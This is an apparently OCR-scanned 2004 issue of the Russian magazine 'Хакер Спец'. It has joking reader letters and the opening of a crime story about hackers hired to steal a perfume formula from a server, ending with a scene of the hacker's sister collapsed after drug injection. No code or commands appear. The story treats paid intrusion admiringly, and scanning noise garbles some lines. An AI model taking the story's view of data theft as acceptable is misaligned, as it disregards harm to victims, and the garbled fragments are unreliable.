стратегию анализа удаленной системы не расскажу. 
В основном, потому что сам не знаю :). 


Привет, пацаны! 


Позарез нужна прога для массовой рассылки сообщений по аське и мылом. Помогите, плиззз). 


ОТВЕТ: 


ОК. Уважаемые читатели, ответьте, пожалуйста, человеку, что вы думаете о спаммерах :). Мыло прилагается. 


ХАКЕРСПЕЦ | 10(47) [2004 


FROM: СЕРГЕЙ МОСКВИН [MSNDRAGON@RAMBLER.RU] 


SUBJECT: КОРЗИНА 


Привет, Спец. Вы затрагиваете большие и интересные темы, HO некоторые маленькие упус- 

каете :) Меня интересует, возможно ли убрать с Рабочего стола Корзину? С нетерпением 
жду ответа либо в журнале, либо напишите, пожалуйста, на MSNDragon@rambler.ru или 
MSNDragon@yandex.ru. 


OTBET: 

Конечно, упускаем. Потому что мы He знаем, как это сделать. Вон Горл даже не 
знает, что такое Рабочий стол. Он ничего, кроме консоли, никогда не видел и ви- 
деть не хочет. Я видел эту корзину, но она какая-то прозрачная и непредстави- 
тельная, не знаю, зачем ее удалять, все равно не видно ее. Если ты имеешь в 
виду физическую корзину, то я не понимаю, что она делает на столе, поскольку 
на полу ей самое место или в мойке на кухне. 


FROM: YUUURIK [YUUURIK@MAIL.RU] 


SUBJECT: 


Уважаемая редакция! 

Огромная просьба подтвердить или опровергнуть (что, честно говоря, не хотелось бы) ин- 
формацию о стоимости заказа на комплект "Хакер Спец" + "Железо" на 3 месяца, объявленный в 
#09(46) за сентябрь 2004 года на странице 78 в сумме 189 рублей 00 копеек. Еще один вопрос: 
кто понесет ответственность, если заказ не будет выполнен, ведь на самом видном месте указано 
ГАРАНТИРОВАНО РЕДАКЦИЕЙ "ХАКЕР СПЕЦ"? Очень хочется узнать данные этого конкретного че- 
ловека! Я уже оформил и оплатил заказы на этот комплект на весь год и подумываю оформить 
еще лет на 5-10 вперед!!! Ведь я являюсь читателем и горячим почитателем журналов линейки 
"Хакер": "Хакер Спец" и "Железо" - практически с первых номеров, и это было бы просто сказкой 
для взрослых - подарком нашего родного, ватного Деда Мороза из детства, а не одетого в гайда- 
мацкий колпак и красный кафтан, перетянутого мушкетерским ремнем и натянувшего на себя 
обувь Кота в сапогах, считающего какие-то проценты заморского Санта-Клауса. Прошу рассмот- 
реть это письмо как официальный запрос и дать официальный ответ в установленные законода- 


тельством сроки по адресу [censored]. Gr and Theft Aut 
0: 
OTBET: i Antireas 


Уважаемый Юрий! Отвечает тебе главный бюрократ журнала «Хакер Спец» - 
Александр. К сожалению, предоставить тебе ответ в указанные на заборе за- 
коном сроки мы не имеем возможности. Для получения ответа в течение 1 ме- 
сяца с момента получения письма тебе необходимо соблюсти некоторые про- 
цессуальные формальности: предоставить скан паспорта или свидетельства о 
рождении, свидетельства о браке, справку с места учебы, выписку из домовой lo 
книги, справку о доходах, результаты анализов Ha ВИЧ, HBsAg, RW, заверен- ndon Games We 
ные у нотариуса, a также оплатить стандартный бланк заявки (форма У-2461П, ek 2004 
34 kon.) по адресу: г. Электрозаводский, улица Крейсера Варяга, 15. Часы pa- 
боты: с 15:00 go 17:00 каждую четную пятницу високосного года. Испугался? 
Шучу я. На самом деле, все гарантировано как в швейцарском банке, а 189 
рублей стоит комплект при подписке 1 месяц, а не 3, естественно. Небольшая 
опечатка ;). 


Тот Claney’s Зи тег Cell: 


SUBJECT: КОНСТРУКТИВНАЯ КРИТИКА 40$ Theory 


FROM: ALEX_POCHTAMT [A_LEX@POCHTAMT.RU] 


Привет, ребята! Вряд ли опубликуете мое письмо в вашем журнале, HO не для того пишу. 

Ваш журнал я покупаю сравнительно недавно и единственное, о чем пожалел, почитав его, 
что он не попался мне на глаза раньше. Замечательный журнал (не прибавить, не убавить)! Теперь о 
прилагаемом к журналу диске (тут совершенно другая картина). В ответе на одно из писем читателей 
вы пишете: "Даешь больше конструктивной критики!". Что ж, извольте. Взгляните на скриншот ва- 
шей программы обзора содержания диска. Вам нравится? Согласитесь, что подобно выглядящий ин- 
терфейс слегка дискредитирует название журнала "Хакер" (то есть профессионал) и более подходит Def Jam Я h 
для журнала с названием "Ламер" :). Если это для вас затруднительно - добиться корректного отоб- 9 t fi or N у 
ражения на мониторах с разным разрешение (у меня 1280x1024), то лабайте в HTML, как это делает 
журнал [censored], например. 


ОТВЕТ: 

Опубликуем, просто сократим слегка, а то не влезет. Всю критику я уместил, но 
вот часть советов вырезал, поскольку их-то, кроме нас, читать никому не инте- 
ресно :). Действительно, отзывы читателей мы любим (Андрюша называет это 
конструктивной критикой), но вообще-то приятен любой фидбэк. Когда чувству- 


ешь, что ты работаешь не просто в пустоту, а для людей, которые это еще и чита- 
ют, - это гут. Насчет диска обещаем разобраться. a 


(game) 


www.gameland.ru 


|= A. Lang т Ly 


) \ | 
в м \ 


Niro (niro@real.xakep.ru) 


НИЧЕГО 
ЛИЧНОГО 


- Робин Гуд, блин! - выругал- 
ся Смирнов, продолжая неотрыв- 
но разглядывать на экране полу- 
ченные данные. - У богатых беру, 
бедным отдаю! По-моему, меня 
элементарно развели! 

Происходящее сейчас на эк- 
ране монитора было совсем не 
похоже на то, что ему обещал 
толстяк. Договор был более чем 
прозрачным, Смирнову казалось, 
что он предусмотрел практически 
все, заключая некое подобие контракта (хотя какие, к черту, контракты, когда 
речь идет о противозаконном бизнесе!), поэтому ему очень странно было ви- 
деть то, что он видел... 

Он должен был выполнить довольно сложную и интересную работу - 
впервые в жизни ему приходилось взламывать сервер, чтобы похитить - что 
бы вы думали? - формулу новых духов, которые должны были поступить в 
продажу во Франции лишь через полгода. Смирнов не вдавался в подроб- 
ности того, откуда у заказчика подобная информация и почему он в курсе 
секретных парфюмерных разработок - он вежливо выслушал все, о чем его 
просили, кивая в нужных местах, после чего спросил о сумме и сроках. 

Сумма была более чем достаточная, а вот сроки несколько расстроили. 
Чтобы заработать обещанное, нало было поторопиться. 

Тогда, в день заключения договора, он встал с кресла, прошелся по ши- 
карному кабинету, глядя себе под ноги и размышляя. Несмотря на то что он 
еще не согласился с условиями и не принял аванса, в голове уже выстраи- 
вался план работы - с чего начать, как продолжить, с помощью чего закре- 
питься на сервере, как замести следы и где хранить данные. 

Заказчик внимательно следил за ним пронзительным взглядом, вращая 
на толстом безымянном пальце золотой перстень. OH с видимым удоволь- 
ствием наблюдал за тем, как Смирнов шевелил губами, разговаривая сам с 
собой; чувствовалось, что внутри парня идет борьба - деньги против здраво- 
го смысла. Смирнов будто бы давал самому себе ответы на вопросы о 
собственной квалификации - сможет или не сможет? 

- Я попробую, - достаточно твердо сказал он через пару минут. - Скажу 
больше - я уверен, что сделаю это. Да, сделаю. Правда, я, как и подобные 
мне люди, лицемерю - ненавижу воров и сам им являюсь. Но, черт побери, 
я больше ничего не умею делать - а уж то, что умею, делаю очень и очень 
хорошо. 

- Я знаю, что вы настоящий ас, - кивнул заказчик. - Ия был уверен, что 
вы согласитесь. Рад, что вы не пытаетесь задавать лишние вопросы - в на- 
шем бизнесе это первейшее правило собственной безопасности. Да я бы и 
не ответил вам ничего особенного - вы же понимаете. 

Смирнов кивнул. 

- Каждый, кто ворует, - продолжил заказчик, - делает это только по одной 
причине (я не беру в расчет клептоманов) - чтобы лучше жить. Я человек, 
немного поднявшийся над этим уровнем, я хочу, чтобы и другие люди поль- 
зовались плодами моего воровства и жили лучше. 

Смирнов кивнул снова, понимая, что каждый вор в свободную от прес- 
тупления минуту только и делает, что успокаивает свою совесть, находя для 
себя каждый раз все более диковинные оправдания. Его же собеседник восп- 
ринял кивок Смирнова как согласие с предложенной философией. 

- Если мы успеем наладить производство, то уже через три-четыре меся- 
ца наши русские женщины будут пахнуть так привлекательно и сексуально, 
что французы удавятся отгого, что их обошли. Поэтому очень важно, чтобы 
следов не осталось - чтобы не было потом разговоров на тему, кто у кого ук- 
рал атомную бомбу - у американцев или они у нас. 

Смирнов присел на диван, сплел пальцы рук и крепко сжал их. Ему очень 
не хотелось сейчас дискутировать о пользе украденных технологий. 

- Яуже сказал, что сделаю это, - вставил он свое слово в монолог. - Я готов прис- 
тупить через час - как только доберусь до дома. Но если вы хотите надежности... 

- Конечно-конечно, - торопливо сказал заказчик и вытащил из кармана 
пиджака несколько новеньких купюр с портретами давно почивших президен- 
тов. - Все, что вам нужно для вашей - и нашей - безопасности... 

Смирнов взял деньги и спрятал в карман куртки. Можно было уходить. 

В метро он, повиснув на перекладине и мерно раскачиваясь в так ходу 
поезда, разглядывал рекламные плакаты и машинально принюхивался к про- 
тискивающимся мимо женщинам - благо, в час пик их было предостаточно. 
Ничего достойного ему почему-то не попадалось - очень часто запах духов 
смешивался с запахом табака или бензина, создавая немыслимые гаммы; 
постепенно Смирнов проникся идеей заказчика подарить нашим женщинам 
что-то действительно стоящее. 

Придя домой, он приготовил себе ужин. Компьютер ждал. 


Давно у него уже не было столь дорогой работы, и это несмотря на то 
что он был хакером очень высокой квалификации. Так уж получилось, что 
примерно полгода он был тише воды ниже травы - пришлось лечь на дно 
после одной удачной, но уж очень криминальной операции по добыче дан- 
ных. Он чувствовал тогда, что уйти незамеченным не удастся, и испытал при 
этом жуткое разочарование: пришлось почти две трети гонорара пустить на 
то, чтобы быстро сменить место жительства. Сестра, которая тратила теперь 
на дорогу в институт в два раза больше времени, возмущалась, но недолго. 
Он едва избежал столкновения с теми, кого обидел, - и осторожность загна- 
ла его в убежище, где он не очень-то высовывался, старался не светиться и 
не напоминать о себе на онлайновых тусовках и форумах. 

Денег хватило впритык - под конец своего вынужденного заточения, срок 
которого он определил себе сам и которого старался придерживаться очень 
и очень точно, он питался впроголодь и был уверен, что его вместе с сестрой 
скоро выкинут на улицу за неуплату по счетам. 

Но он выдержал, а, закончив прятаться, рванулся на волю. Старые друзья 
были рады услышать о том, что он жив, что он на свободе и горит желанием 
работать. Ему быстро сосватали пару выходов в сеть, он срубил немного ба- 
бок, вздохнул свободнее, погасил все долги и даже кое-что прикупил для 
своего компьютера - пусть мелочь, но приятно. 

Короче, былая слава захлестнула его с головой. Он снова принялся за 
книги, за изучение новых материалов, связанных со взломом, - брал иху 
друзей, в сети, где придется. Мозгов хватало и на то, чтобы искать новые пу- 
ти самому. Некоторые собственные открытия оказались как нельзя кстати не 
только ему, но и соратникам по цеху. 

Он выходил на новый виток своего творчества. Давно у Смирнова не бы- 
ло такой жажды деятельности, как после полугодового затворничества; он 
скупил практически все книги по нужным для него темам, подписался на кучу 
бумажных журналов и электронных рассылок (для страховки создав несколь- 


Впервые в жизни ему 
приходилось взламывать 
сервер, чтобы похитить 
срормулу новых вухов 


ко почтовых ящиков, чтобы никто не заподозрил его в единоличном собира- 
нии подобного рода информации в недопустимо больших количествах). 

- Нетв жизни ничего такого, чего нельзя было бы сломать - ведь так инте- 
ресно узнать, что там внутри, - часто говорил он своим друзьям по команде. И 
на вопрос: «А как ломать, если уже сломано?» - отвечал со злорадной усмешкой: 

- Значит, можно не ломать. МОЖНО УНИЧТОЖИТЬ. 

И наглядно демонстрировал свои принципы, «добивая лежачего» - на 
спор убивая уже, казалось бы, безвозвратно потерянные ресурсы, взломан- 
ные опытными руками таких же, как он сам, хакеров. 

«Путь есть всегда» - этот принцип практически всегда помогал ему в ра- 
боте. Он никогда не брался за дело в пессимистическом настроении - знал, 
что ничего не получится. Именно поэтому он не отказывался от предложен- 
ных задач - лишь изредка по одному ему известным идейным соображениям. 
Но зато и соглашался достаточно непредсказуемо - будто бы уповая на черта 
и бога одновременно. 

Одного он не любил - игры «в темную». Время от времени люди, нанимаю- 
щие его, лгали, причем лгали грубо, не стараясь спрятать ложь за аккуратными 
формулировками. Таких людей он наказывал пропорционально объему лжи. 

И еще никто не потребовал его извинений, ибо он был прав. Заказчики 
соглашались с его подходом к делу, находя его деловым и имеющим право 
на существование. Смирнов всегда доставал то, о чем его просили, но брал 
столько, сколько хотел. 

Короче, он был едва ли не самым крутым хакером этого большого безум- 
ного города. Он был талантлив, умен, он грамотно рисковал и залихватски 
тратил заработанное. 

И когда вместо формулы парфюма он слил для заказчика совершенно 
другую рецептуру, его умения и таланты проявились во всей своей красе. 


иль 


Фильм оставил тягостное впечатление. Павел вышел на яркий свет ули- 
цы, прищурился, закрывая лицо ладонью от бьющих в глаза солнечных лу- 
чей, и сквозь зубы тихо выругался. 

- Какой кошмар! - покачал он головой, не обращая внимания на то, что 
остановился практически на самом выходе из кинотеатра; десятки локтей и 
колен прошлись по нему, но он не заметил этого. - Это не может быть прав- 
дой, люди на такое не способны... » 
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Впечатление было действительно ужасным - кровь и перекошенные лица 
безумцев, вопли толпы, дьявольские крики, любовь и предательство, ложь и 
истина... Павел вспомнил, что никогда не было так тихо в зале, как сегодня. 
Зрители были поглощены происходящим на экране полностью и безвозврат- 
но - Павел понял это, когда зажгли свет. 

Никто не собирался вставать. 

Не потому, что ждали продолжения или были разочарованы финалом. 
Просто ни у кого не осталось сил на то, чтобы уходить. И только самые не- 
терпеливые сумели подвигнуть зал к тому, чтобы все пошли к выходу. 

Люди шли молча, вынося с собой пустые стаканы из-под колы и кукуру- 
зы, тихо опуская в урны пивные бутылки; они будто бы приобрели во время 
просмотра фильма нечто тяжелое, неподъемное и одновременно стряхнули с 
плеч мрачные призраки собственных предубеждений и ошибок. Павел прочу- 
вствовал все это на собственной шкуре. 

Он, как и все, с опущенной головой пробирался к выходу, потом увидел 
над головой солнце и наткнулся на него, как на невидимую стену. Солнце 
вернуло ему прежнюю жажду жизни - но он понимал, что уже никогда не бу- 
дет прежним. Фильм изменил его навсегда. 

Из транса вывел звук сирены. Он медленно, нехотя посмотрел по 
сторонам и увидел подъезжающую к кинотеатру «Скорую помощь». Где- 
то за спиной раздались торопливые шаги, кто-то просил расступиться; 
двое крепких мужчин несли на руках уже немолодую женщину с запроки- 
нугой головой. 

По толпе, выходящей на улицу, прокатился шепот: 

- Прямо в зале... Стало плохо... Наверное, инфаркт... Еще бы, такое кино... 

Павел смотрел вслед отьезжающей карете «Скорой» и чувствовал, как 
бесится в груди душа, пытаясь закричать на всю площадь. Эта женщина, у 
которой не выдержало сердце, она взяла весь негатив толпы, всю ее темную 
мощь, которой был насыщен зал перед началом фильма. Она пропустила все 


Символы выстраивались 
в конструкцию, несущую 
в себе маленькую 
кибернетическую бомбу. 


сквозь себя, чувствуя, как с каждым вскриком, с каждой слезой выходит из 
зрителей проклятие человеческого рода... 

Павел поднял глаза на афишу. Большой желтый прямоугольник слегка 
трепыхался на ветру, но буквы были четко различимы даже издалека. 

«СТРАСТИ ХРИСТОВЫ». 

Он хотел что-то сказать самому себе - но сирена «Скорой» не дала это 
сделать. И тогда он пошел домой. Его ждала работа... 


жжжях 


- Да, говорите, - Павел прижимал трубку телефона к плечу, наклонив голо- 
ву; руки лежали на клавиатуре, пальцы периодически прыгали по клавишам. - 
Кому? Вам? Вам нужна такая ерунда? Не смешите меня! Подождите секунду... 

Он быстро положил трубку на стол рядом с собой, внимательно всмот- 
релся в экран и сжал губы в тонкую полоску. 

- Пан или пропал, - шепнул он себе под нос. - Прорвемся... 

Пальцы легли на клавиши, глаза не отрывались от экрана. 

- Сюда... А теперь вот так... Возвращаем значение... Придурки, Господи 
прости... 

Он схватил трубку телефона - там, на другом конце, собеседник ждал, 
когда о нем вспомнят, быстро произнес: «Подождите еще, я CKOPO...», клац- 
нул ей снова об стол и хмыкнул себе под нос: 

- Сколько раз слышу: «проверяйте ввод на значение... Хоть бы кто, нет, 
ну хоть бы кто следил за этим... Придурки, точно! 

Он быстро набросал карандашом несколько команд на листке бумаги ря- 
дом с мышкой, пробежал их глазами, кивнул, после чего быстрым заученным 
движением взял зажигалку, поджег уголок листа и швырнул в алюминиевый 
таз рядом с собой. Пламя в считанные секунды превратило листок в горстку 
пепла - в еще одну поверх таких же ушедших в небытие записок. 

Аеще через секунду он уже вводил команды на странице атакуемого сер- 
вера. Символы выстраивались в конструкцию, несущую в себе маленькую ки- 
бернетическую бомбу. 

- Так будет с каждым, - говорил он монитору, набирая строки. - С каж- 
дым уродом, который даром ест свой хлеб... 

Атака удалась. Сервер откликнулся на его предложение поработать «на- 
лево», данные, заказанные на сегодня, аккуратным потоком сливались на 
несколько винчестеров. 
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И TyT OH вспомнил о телефонном разговоре. Решив, что его уже никто не 
ждет, он медленно поднес трубку к уху и услышал там несколько раздражен- 
ное сопение. 

- Да, - сказал Павел как ни в чем не бывало. - Я снова здесь. 

- И это замечательно, - раздался в трубке голос. - Почему вы назвали то, 
о чем я прошу вас, ерундой? 

Павел отъехал в кресле от стола, поднял глаза к потолку и удивленно 
спросил в ответ: 

- Вы хоть сами понимаете, о чем говорите? 

- Безусловно. Иначе бы не просил вас об услуге. 

Человек на том конце провода явно не шутил, да и представился он та- 
ким образом, что сразу было - он не шутит ни на грамм; судя по паролю, ко- 
торый он назвал, направили его сюда те люди, которым можно доверять. 

- Хорошо... Ерундой я назвал это неслучайно - ибо все очень просто. И 
одновременно очень сложно. Настолько сложно, что я бы не хотел даже слы- 
шать о том, что вы у меня попросили. Я бы даже хотел повернуть время 
вспять и стереть из своей головы упоминание об этом. Сама мысль о том, 
что меня попросили... Короче, у нас еще есть шанс расстаться, и очень неп- 
лохой шанс, поверьте. 

- Вы думаете, что я из спецслужбы? 

- Я вообще не думаю, - дернулся Павел. - Но веры к вам практически ни- 
какой. 

- Новы же как-то находите себе работу? - не унимался собеседник. - 
Как-то же вы доверяете людям, ну хотя бы изредка?! 

- Интуиция, - покачал головой Павел. - Не спорю, когда-нибудь она меня 
погубит - но не сейчас. Вам нужно привести очень веские аргументы - иначе 
мы никогда не договоримся. 

- Но вы подтверждаете - в принципе - факт того, что вы можете... 

- Вы что, придурок? Придурок, такой же, как... - он едва не расписал со- 
беседнику все подробности ума тех людей, которым он добавил несколько 
минут назад головной боли на всю жизнь. - Ладно, оставим это. Ничего я не 
подтверждаю. Ничего и никогда. До встречи. 

И он положил трубку. Разговор закончился. 

Разговор на десять штук баксов. Именно с цены начал его неизвестный 
заказчик по телефону - и именно это отпугнуло Павла. Но почему-то каза- 
лось, что они еще встретятся. 


В 


Человек, который разговаривал с Павлом, услышав в трубке гудки, долго 
не опускал ее в зарядную подставку, слушая мерный высокий сигнал. На ли- 
це было написано нечто среднее между разочарованием и нетерпением. Не 
хотелось верить в то, что попытка сорвалась, и хотелось как можно скорее 
попробовать снова. Но торопиться было нельзя. 

Когда трубка вернулась-таки на место, поставленная аккуратной холеной 
рукой, человек поднялся, подошел к противоположной стене роскошного ка- 
бинета, остановился возле огромного, в несколько сот литров аквариума, 
подсвеченного мягким золотистым светом, и принялся следить взглядом за 
искрящимися экзотическими рыбками. 

- Зря он думает, что, отказавшись, он выиграл. Зря... 

Рыбки его не слышали, бросаясь из стороны в сторону перед его лицом 
в поисках корма. 

- Он проиграл уже хотя бы потому, что слышал все то, что я хотел ска- 
зать. Сам факт нашего разговора - его капитуляция. Представляю, о чем он 
думает сейчас... 

Рука протянулась к коробке с кормом. Пригоршня дафний мягко легла на 
водную поверхность точно в квадратик кормушки. Рыбки кинулись к ней, рас- 
талкивая друг друга. Поверхность воды заходила ходуном, небольшие и 
быстро гаснущие концентрические круги от кормушки заколыхали водоросли. 

- Главное - вовремя накормить, - стряхивая с ладоней пыль от сухого 
корма, проговорил человек. - И ведь этот принцип работает... Безотказно. 

Вернувшись за стол, он раскрыл ноутбук, просмотрел почту, ответил на 
пару писем. Руки автоматически нажимали на клавиши, глаза читали строки 
писем, мозг формировал ответы - но он был далеко отсюда... 

Внезапно он отставил в сторону компьютер. Огромная плазменная па- 
нель в полстены, напоминающая окно, ровно засветилась. 

- Помнится, я не вынимал диск, - сказал человек сам себе. Откинув на 
пульте панель, которая закрывала кнопки управления домашним кинотеат- 
ром, он включил дополнительные колонки, а затем воспроизведение. 

Фильм преобразил его. И когда с экрана полилась в комнату латинская 
речь Пилата, когда на площади на неуклюжем языке проповедовал Каиафа, 
этот человек растворил все свои заботы в своих собственных слезах. 

Он плакал как ребенок, глядя на истерзанное тело Христа на кресте; он ку- 
сал губы, слушая божественную музыку... Титры он не читал - он знал их наи- 
зусть; каждое слово на языке, чуждом современности, было для него родным. 


Не отрываясь от экрана, он вытащил из внутреннего кармана пиджака 
блокнот и записал туда дорогой чернильной ручкой: «Храм Христа Спасителя 
- завтра в 15 часов». 

«Father... Into your hands | commend my spirit...» 

К концу фильма слезы кончились. Он кинул под язык таблетку нитрогли- 
церина, выключил телевизор и, откинув голову на спинку кресла и вслушива- 
ясь в тихое шипение колонок, довольно быстро заснул. 

Эмоции были высосаны из него все без остатка. 


а 


Десять тысяч долларов - это много. То есть для такой услуги, о которой 
его просили, много. Но ведь тоже - как посмотреть... 

Павел сидел, уставившись невидящим взглядом в телевизор. Он сидел 
так уже почти два часа. Призрак денег витал перед ним; он чувствовал их за- 
пах, видел их отблеск. Приходилось смириться, что придется сделать то, о 
чем его просили. 

Вернувшись за комп, парень прошелся по нескольким каналам Далнета, 
на которых время от времени встречал Смирнова под ником «Шарк» - пусто, 
про «Акулу» никто не слышал. Жаль... 

- Будем думать, - произнес Павел и прошелся по комнате. Где-то же 
Смирнов должен был сейчас быть - ведь совсем недавно, по словам того, с 
кем разговаривал Павел, этот парень совершил очень крутой «лом» и пропал 
с его результатами, кинув человека на хорошие бабки. 

Вероятность отследить перемещение «Акулы» была невелика - надо было 
мыслить, как он, поставить себя на его место. Чертовски сложная задача. Тем 
более, когда краем глаза все время видишь где-то на горизонте пачку баксов. 

Он пытался вспомнить все, что знал о Смирнове - все, что он когда-то 
мог слышать о нем от тех, кто имел с ним прямые контакты. Таких людей бы- 
ло не очень много, человек десять, максимум, двенадцать - но и они на кана- 
лах Далнета были редкостью, открыв свои собственные защищенные линии и 
не допуская туда никого. Можно было, конечно, спросить в открытую - но 
факт нарваться на грубость и заставить Смирнова исчезнуть отпугивал его. 

И потом - он до сих пор не мог понять, зачем его все-таки наняли на эту 
идиотскую работу, чем же так насолил Смирнов и что за данные он похитил. Не 
вязался в голове образ «Акулы» с воровством и подставой - ну никак не вязался! 

Внезапно на одном из каналов всплыло имя Смирнова. Павел кинулся ту- 
да, имитируя старую дружбу, но его грубо поставили на место, спросив кодо- 
вое слово. 

Отстучав что-то глупое, Павел отключился. Всплывали остатки совести, 
пытающиеся пробить на поверхности сознания лед толщиной в пачку денег. 

Ведь ему предложили сдать Смирнова. За десять тысяч долларов. 


ие 


После успешного, за пару дней проведенного «лома» Смирнов, пригото- 
вившись принимать данные, раскрыл очередной буклет одной из фирм, расп- 
ространяющих парфюмерию на территории России, смахнул на диван малень- 
кий квадратик целлофана с запаянной внутри каплей духов и рассмотрел при- 
ветливо улыбающуюся физиономию неизвестной фотомодели. Реклама впе- 
чатлила; он аккуратно ногтем вскрыл пробник с духами, капнул на палец, поню- 
хал. Понравилось, но не очень - что-то в этом запахе было терпкое, резкое. 

- Помягче бы, послаще, - сам себе сказал он, периодически посматривая 
на экран монитора. - А линия-то хорошая, даже очень, - похвалил он качество 
связи, дождался появления окошка с приглашением ввести пароль, зарегист- 
рировался в давно уже взломанной системе и рванул в нужный ему каталог. 

- Вот примерно так ломали «Сиерру», - шептал он в такт щелканью кла- 
виш; почему-то вспомнилось, как в Сети появились исходники «Half Ше-2» и 
демо-версии третьего «Дума». Вот только жалости к тем, кого так грубо и 
нагло обворовали, он никогда не испытывал - менталитет нации, живущей 
целиком и полностью на пиратских дисках и нарушениях закона об авторских 
правах, не давал этого сделать. 

Каталог, в котором он нашел что-то похожее на формулы, был изрядным 
по объему и количеству вложенной информации. Глаза скользили по стро- 
кам; губы шептали непонятные названия. Иногда он отрывался от экрана и 
сверял написанное там с листком бумаги, который дал ему заказчик. Нужного 
словосочетания и комбинации цифр пока не встречалось. 

- Может, скачать все? - спросил Смирнов сам у себя, потом взглянул на 
размер предполагаемой транзакции, присвистнул и продолжил просматри- 
вать каталог на сервере. Сколько раз за свою бурную хакерскую жизнь он 
сканировал глазами залежи неизвестной информации, от которой возможно, 
зависело чье-то благополучие, а может быть, и жизнь? Сколько раз он делал 
то, что делает сейчас? Он не задумывался над этим. Когда-то он пытался за- 
писывать за собой, сохранять разными способами результаты работы, пока 
не понял, что подобным образом подписывает себе приговор - незачем было у 
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НИЧЕГО ЛИЧНОГО 


хвастать этим перед самим собой; а показать это кому-нибудь было бы прос- 
то невозможно, разве что таким же, как он - безбашенным и талантливым, 
объединенным одной общей идеей, одним стремлением. 

ОНИ ХОТЕЛИ ПОЛУЧИТЬ ВЛАСТЬ НАД СЕТЬЮ. 

И это им удалось. Смирнов давно уже не испытывал никаких трудностей 
за компьютером. Точно так же вели себя и его друзья. Компьютер был еще 
одним органом их тела, они жили вместе с ним, не в силах существовать по- 
рознь. Это, конечно же, не означало, что они ходили с ноутбуками в туалет и 
знать не знали, что делается за окнами их квартир - ничто человеческое не 
было им чуждо. Они не были героями анекдотов, все было предельно орга- 
нично - именно поэтому они достигли тех высот, о которых многие только 
мечтали, не в силах совладать с сетью. 

...Запах духов постепенно распространился по всей комнате. Смирнов 
поводил носом из стороны в сторону, представил себе вершины технологий, 
связанные с передачей запахов, подумал, что это было бы интересно - смот- 
ришь страницу, посвященную парфюмерии, и можешь попробовать все, что 
там предлагается... 

- Аесли смотришь страницу с девочками? - ухмыльнулся он. - Даже и не 
думай! Работать надо. 

Он снова пристально вгляделся в экран, засомневался в нескольких стро- 
ках, что уже ушли за верхний край страницы, прокрутил назад. Внезапно в 
замке повернулся ключ, хлопнула входная дверь. Пару раз цокнули каблуки, 
потом что-то маленькое упало на пол, раздался шумный вздох. 

Пришла сестра. Он жил с ней без родителей уже четыре года - мать с OT- 
цом остались в российской глубинке, отправив детей покорять большой го- 
род. Денег пока хватало, они с сестренкой снимали квартиру в достаточно 
дешевом районе (ту самую, которая спасла Смирнову жизнь), учились в меру 
способностей (он закончил институт в прошлом году, Наташке оставалось 
еще пара курсов). В общем, жили - не тужили, когда было нужно, уступали 
друг другу квартиру в единоличное пользование, периодически ссорились, 


- Вот примерно так ломали 
«Сиерру», - шептал он в такт 
щелканью клавиш 


всегда мирились. Брат давал сестре дельные советы и отваживал придуроч- 
ных женихов-акселератов, сестра содержала в порядке квартиру и не забыва- 
ла запихнуть брату в рот пару бутербродов во время его работы в сети, когда 
он превращался в «боевую хакерскую машину». 

- Сейчас зайдет, - шепнул под нос Смирнов. - Запах почувствует и обяза- 
тельно прибежит. Подумает, что у меня тут есть кто-то... 

Но сестра не появилась. Смирнов услышал, как у нее в комнате скрипнул 
диван - судя по звуку, она не просто опустилась на него, а упала с размаху. 
Что-то там было не так. 

Он кинул взгляд на экран, запомнил картинку и по дороге в Наташкину 
комнату сквозь полуоткрытые веки просмотрел ее всю, отметив, что можно 
отматывать дальше. А потом он открыл дверь... 

Наташка лежала на диване лицом вниз, ноги свешивались, туфли валя- 
лись рядом - их снять у нее сил хватило. 

- Выпила, что ли, сестренка? Крепко? 

Наташка молчала. Смирнов хмыкнул, подошел, присел рядом, положил 
руку на плечо. Она дышала редко, ровно, иногда постанывая. Запаха алкого- 
ля вроде бы не было. Это насторожило брата. 

- Наташка? - шевельнул он ее за руку. Никакой реакции. Он наклонился 
пониже, понюхал - она совершенно точно не пила крепких напитков. Какие-то 
нехорошие подозрения стали зарождаться в голове у Смирнова, он уже с 
большей силой постарался расшевелить сестру, но это ему не удалось - 
лишь легкий стон был ответом на попытки. 

Тогда он решительно встал, поднял ее на руки и положил лицом вверх, 
расстегнув легкую куртку, которую она не сняла, войдя в квартиру. Девушка 
абсолютно не двигалась, представляя собой какую-то податливую мягкую 
куклу, безвольно свесившую с дивана руку. Pyky.. 


На предплечье Наташки Смирнов увидел тонкую засохшую струйку крови. 


Она ровной полоской проходила по предплечью и на пару сантиметров выг- 
лядывала из-под часов. 

Брат медленно закатал рукав и обомлел. На сгибе локтя он обнаружил 
несколько точек от инъекций, в том числе и свежую - ту, из которой натекла 
кровь. По большому счету, все они были свежими - похоже, что она стала 
принимать наркотики недавно, недели полторы-две назад. Смирнов медлен- 
но опустил руку на диван и всмотрелся в лицо сестры. 

Больше всего он испугался передозировки. 
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Дышала она по-прежнему ровно, хотя и редко. С каждым вдохом лицо на 
несколько секунд розовело, но потом губы вновь становились тонкими и 
мертвенно-бледными. Смирнов, не отрывая глаз от сестры, нашарил рукой 
на тумбочке телефонную трубку и позвонил в «Скорую». Вызов приняли до- 
вольно грубо и нехотя; Смирнов представил, как на «Скорой» ненавидят нар- 
команов, покачал головой и закусил губу. 

- Наташка, Наташка, - прошептал он. - Как же так... 

Потом он увидел ее сумочку, брошенную на пол у дверей. Из нее торчал 
одноразовый шприц с иглой, заткнутой колпачком. Смирнов встал с дивана и 
приблизился к сумочке, как к бомбе с часовым механизмом. Шприц вызвал в 
нем такой страх, что он первую минуту боялся нагнуться и поднять его; серд- 
це колотилось в груди, он покрылся липким потом. 

Наклониться все-таки пришлось. Шприц - обыкновенный, корейский, пя- 
тикубовый. Внутри - не совсем прозрачная жидкость со слабым оттенком 
желтизны. Смирнов машинально взболтнул, отметил, как в шприце появи- 
лись какие-то завихрения. 

- Этого не может быть, - сам себе сказал он. Этого просто не могло прои- 
зойти в их семье, с детства воспитанной в духе боязни подобных вещей и 
отвращения к ним. Сам Смирнов не курил, пил только пиво и от своей сест- 
ренки ожидал подобного отношения к жизни. Но кто-то подправил мораль, 
заложенную в нее родителями. 

- Твари! - проскрипел он зубами, потом метнулся в туалет, раскрошил в 
руках шприц, швырнул то, что осталось, в унитаз и дважды спустил воду - 
второй раз для гарантии и от презрения к тому, что эта гадость была в его 
доме. Потом он вытряхнул все содержимое сумки на пол, вывернул карманы 
Наташкиной куртки - больше ничего не было. 

- Ну, где же эта чертова «Скорая»! - кричал он на закрытую дверь, време- 
нами глядя на все реже начинающую дышать сестру. - Поторопитесы! 

